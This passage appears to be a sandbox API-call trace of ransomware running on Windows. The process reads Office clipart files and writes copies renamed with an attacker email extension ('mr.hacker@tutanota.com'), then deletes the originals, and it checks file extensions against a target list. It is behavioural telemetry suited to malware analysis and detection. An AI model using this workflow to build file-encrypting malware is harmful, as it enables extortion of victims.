[0054.756] ReadFile (in: hFile=0x1b8, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0054.757] WriteFile (in: hFile=0x224, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.757] SetEndOfFile (hFile=0x224) returned 1 [0055.222] CloseHandle (hObject=0x224) returned 1 [0055.222] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0055.222] SetEndOfFile (hFile=0x1b8) returned 1 [0055.223] CloseHandle (hObject=0x1b8) returned 1 [0055.224] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0055.224] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf")) returned 1 [0056.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0056.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0056.425] lstrlenW (lpString=".doc") returned 4 [0056.425] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.425] lstrlenW (lpString=".docx") returned 5 [0056.425] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.431] lstrlenW (lpString=".pdf") returned 4 [0056.431] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.436] lstrlenW (lpString=".xls") returned 4 [0056.438] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.445] lstrlenW (lpString=".xlsx") returned 5 [0056.446] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.452] lstrlenW (lpString=".ppt") returned 4 [0056.452] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0056.452] lstrlenW (lpString=".zip") returned 4 [0056.452] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.452] lstrlenW (lpString=".rar") returned 4 [0056.460] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.460] lstrlenW (lpString=".bz2") returned 4 [0056.460] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.460] lstrlenW (lpString=".7z") returned 3 [0056.460] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0056.460] lstrlenW (lpString=".dbf") returned 4 [0056.460] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0056.460] lstrlenW (lpString=".1cd") returned 4 [0056.460] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 63 [0056.460] lstrlenW (lpString=".jpg") returned 4 [0056.460] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.460] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0056.460] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0056.460] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0056.461] GetLastError () returned 0x0 [0056.461] ReadFile (in: hFile=0x210, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x25ee, lpOverlapped=0x0) returned 1 [0056.462] WriteFile (in: hFile=0x220, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x25f0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x25f0, lpOverlapped=0x0) returned 1 [0056.464] ReadFile (in: hFile=0x210, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0056.464] WriteFile (in: hFile=0x220, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.464] SetEndOfFile (hFile=0x220) returned 1 [0056.464] CloseHandle (hObject=0x220) returned 1 [0056.464] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0056.464] SetEndOfFile (hFile=0x210) returned 1 [0056.465] CloseHandle (hObject=0x210) returned 1 [0056.465] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.465] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf")) returned 1 [0056.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0056.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0056.465] lstrlenW (lpString=".doc") returned 4 [0056.465] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.465] lstrlenW (lpString=".docx") returned 5 [0056.465] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.465] lstrlenW (lpString=".pdf") returned 4 [0056.466] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.466] lstrlenW (lpString=".xls") returned 4 [0056.466] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.466] lstrlenW (lpString=".xlsx") returned 5 [0056.466] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.466] lstrlenW (lpString=".ppt") returned 4 [0056.466] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0056.466] lstrlenW (lpString=".zip") returned 4 [0056.466] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.466] lstrlenW (lpString=".rar") returned 4 [0056.466] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.466] lstrlenW (lpString=".bz2") returned 4 [0056.466] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.466] lstrlenW (lpString=".7z") returned 3 [0056.466] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0056.466] lstrlenW (lpString=".dbf") returned 4 [0056.466] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0056.466] lstrlenW (lpString=".1cd") returned 4 [0056.466] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0056.466] lstrlenW (lpString=".jpg") returned 4 [0056.466] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.467] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=8772) returned 1 [0056.467] CloseHandle (hObject=0x210) returned 1 [0056.467] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf")) returned 0x20 [0056.467] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.467] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0056.467] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0056.467] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0056.467] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0056.468] GetLastError () returned 0x0 [0056.468] ReadFile (in: hFile=0x210, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x2244, lpOverlapped=0x0) returned 1 [0056.480] WriteFile (in: hFile=0x220, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x2250, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x2250, lpOverlapped=0x0) returned 1 [0056.481] ReadFile (in: hFile=0x210, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0056.481] WriteFile (in: hFile=0x220, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.481] SetEndOfFile (hFile=0x220) returned 1 [0056.481] CloseHandle (hObject=0x220) returned 1 [0056.481] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0056.482] SetEndOfFile (hFile=0x210) returned 1 [0056.482] CloseHandle (hObject=0x210) returned 1 [0056.482] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.483] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf")) returned 1 [0056.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0056.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0056.483] lstrlenW (lpString=".doc") returned 4 [0056.483] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.483] lstrlenW (lpString=".docx") returned 5 [0056.483] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.483] lstrlenW (lpString=".pdf") returned 4 [0056.483] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.483] lstrlenW (lpString=".xls") returned 4 [0056.483] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.483] lstrlenW (lpString=".xlsx") returned 5 [0056.483] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.483] lstrlenW (lpString=".ppt") returned 4 [0056.483] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0056.483] lstrlenW (lpString=".zip") returned 4 [0056.483] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.483] lstrlenW (lpString=".rar") returned 4 [0056.483] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.483] lstrlenW (lpString=".bz2") returned 4 [0056.483] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.483] lstrlenW (lpString=".7z") returned 3 [0056.484] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0056.484] lstrlenW (lpString=".dbf") returned 4 [0056.484] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0056.484] lstrlenW (lpString=".1cd") returned 4 [0056.484] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63 [0056.484] lstrlenW (lpString=".jpg") returned 4 [0056.484] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.484] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=14486) returned 1 [0056.484] CloseHandle (hObject=0x210) returned 1 [0056.484] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf")) returned 0x20 [0056.484] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0056.485] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0056.485] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0056.485] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0056.485] GetLastError () returned 0x0 [0056.485] ReadFile (in: hFile=0x210, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x3896, lpOverlapped=0x0) returned 1 [0056.488] WriteFile (in: hFile=0x220, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x38a0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x38a0, lpOverlapped=0x0) returned 1 [0056.490] ReadFile (in: hFile=0x210, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0056.490] WriteFile (in: hFile=0x220, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.490] SetEndOfFile (hFile=0x220) returned 1 [0056.490] CloseHandle (hObject=0x220) returned 1 [0056.490] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0056.490] SetEndOfFile (hFile=0x210) returned 1 [0056.491] CloseHandle (hObject=0x210) returned 1 [0056.491] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.491] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf")) returned 1 [0056.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0056.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0056.491] lstrlenW (lpString=".doc") returned 4 [0056.491] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.491] lstrlenW (lpString=".docx") returned 5 [0056.491] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.491] lstrlenW (lpString=".pdf") returned 4 [0056.492] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.492] lstrlenW (lpString=".xls") returned 4 [0056.492] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.492] lstrlenW (lpString=".xlsx") returned 5 [0056.492] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.492] lstrlenW (lpString=".ppt") returned 4 [0056.492] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0056.492] lstrlenW (lpString=".zip") returned 4 [0056.492] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.492] lstrlenW (lpString=".rar") returned 4 [0056.492] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.492] lstrlenW (lpString=".bz2") returned 4 [0056.492] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.492] lstrlenW (lpString=".7z") returned 3 [0056.492] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0056.492] lstrlenW (lpString=".dbf") returned 4 [0056.492] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0056.492] lstrlenW (lpString=".1cd") returned 4 [0056.492] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0056.492] lstrlenW (lpString=".jpg") returned 4 [0056.492] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.493] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=18304) returned 1 [0056.493] CloseHandle (hObject=0x210) returned 1 [0056.493] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf")) returned 0x20 [0056.493] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.493] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0056.493] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0056.493] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0056.493] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0056.493] GetLastError () returned 0x0 [0056.494] ReadFile (in: hFile=0x210, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x4780, lpOverlapped=0x0) returned 1 [0056.495] WriteFile (in: hFile=0x220, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x4790, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x4790, lpOverlapped=0x0) returned 1 [0056.496] ReadFile (in: hFile=0x210, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0056.496] WriteFile (in: hFile=0x220, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.496] SetEndOfFile (hFile=0x220) returned 1 [0056.497] CloseHandle (hObject=0x220) returned 1 [0056.497] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0056.497] SetEndOfFile (hFile=0x210) returned 1 [0056.498] CloseHandle (hObject=0x210) returned 1 [0056.498] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.498] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf")) returned 1 [0056.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63 [0056.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63 [0056.498] lstrlenW (lpString=".doc") returned 4 [0056.498] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.498] lstrlenW (lpString=".docx") returned 5 [0056.498] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.498] lstrlenW (lpString=".pdf") returned 4 [0056.498] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.498] lstrlenW (lpString=".xls") returned 4 [0056.498] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.498] lstrlenW (lpString=".xlsx") returned 5 [0056.498] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.498] lstrlenW (lpString=".ppt") returned 4 [0056.498] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63 [0056.498] lstrlenW (lpString=".zip") returned 4 [0056.499] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.499] lstrlenW (lpString=".rar") returned 4 [0056.499] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.499] lstrlenW (lpString=".bz2") returned 4 [0056.499] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.499] lstrlenW (lpString=".7z") returned 3 [0056.499] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63 [0056.499] lstrlenW (lpString=".dbf") returned 4 [0056.499] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63 [0056.499] lstrlenW (lpString=".1cd") returned 4 [0056.499] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63 [0056.499] lstrlenW (lpString=".jpg") returned 4 [0056.499] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.499] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=11058) returned 1 [0056.499] CloseHandle (hObject=0x210) returned 1 [0056.499] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf")) returned 0x20 [0056.499] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 